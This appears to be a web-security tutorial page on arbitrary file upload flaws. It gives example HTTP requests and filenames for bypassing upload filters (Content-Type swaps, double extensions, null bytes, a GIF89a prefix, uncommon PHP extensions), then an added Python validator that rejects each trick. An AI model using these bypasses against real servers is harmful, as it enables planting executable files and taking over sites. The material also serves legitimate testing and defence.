# Arbitrary File Upload

## Introduction
An arbitrary file upload vulnerability is a security flaw that allows an attacker to upload malicious files onto a server.

## Where to find
In any file upload feature, for example a profile photo upload.

## How to exploit
1. Change the `Content-Type` value
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
```
Change the `Content-Type`
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg
```

2. Try to change the extension when sending the request. For example, here you can't upload a file with the `php` extension, but you can upload a `jpg` file
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php
```
Change the request to this
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
```

3. Upload the payload, but start with `GIF89a;`
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif

GIF89a;
```
And don't forget to change the `Content-Type` to `image/gif`

4. Bypass content length validation; it can be bypassed using a small payload
```
()
```

5. Use a null byte in the filename
```
file.php%00.gif
```

6. Use double extensions for the uploaded file
```
file.jpg.php
```

7. Upload a less common PHP extension (php4, php5, php6, phtml)
```
file.php5
```

8. Try randomly capitalizing the file extension
```
file.pHP5
```

9. Mix the tips!
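
The following is an added example, not part of the original page: a server-side validator, written in Python for illustration, that rejects each filename and `Content-Type` trick listed above. The function name `validate_upload`, the allowlist and the size limit are assumptions.

```python
import os
import secrets

# Allowlisted extensions and the magic bytes each format must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions a PHP-enabled server may execute, including the variants above.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php6", "php7", "phtml", "phar", "pht"}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit


def validate_upload(filename, client_content_type, data):
    """Return (ok, reason, stored_name).

    client_content_type is ignored on purpose: it is sent by the client,
    so it says nothing reliable about the file.
    """
    if "\x00" in filename or "%00" in filename:
        return False, "null byte in filename", None
    base = os.path.basename(filename.replace("\\", "/"))
    exts = [p.lower() for p in base.split(".")[1:]]  # every extension, case-folded
    if not exts:
        return False, "missing extension", None
    if any(e in SCRIPT_EXTS for e in exts):
        return False, "script extension present", None
    if exts[-1] not in ALLOWED:
        return False, "extension not allowlisted", None
    if not 0 < len(data) <= MAX_BYTES:
        return False, "size out of range", None
    if not data.startswith(ALLOWED[exts[-1]]):
        return False, "magic bytes do not match extension", None
    # Server-chosen name: nothing from the client reaches the stored path.
    return True, "ok", secrets.token_hex(16) + "." + exts[-1]


if __name__ == "__main__":
    # Constructed inputs mirroring the filenames used on this page.
    gif = b"GIF89a;" + b"\x00" * 16
    for name, ctype in [("dapos.php", "image/jpeg"), ("dapos.php.jpg", "image/jpeg"),
                        ("file.php%00.gif", "image/gif"), ("file.jpg.php", "image/jpeg"),
                        ("file.pHP5", "image/gif"), ("avatar.gif", "image/gif")]:
        print(name, validate_upload(name, ctype, gif)[:2])
```

Matching magic bytes does not make a file harmless, since a `GIF89a;` prefix can precede script code, so the stored file should also be served from a location where script execution is disabled.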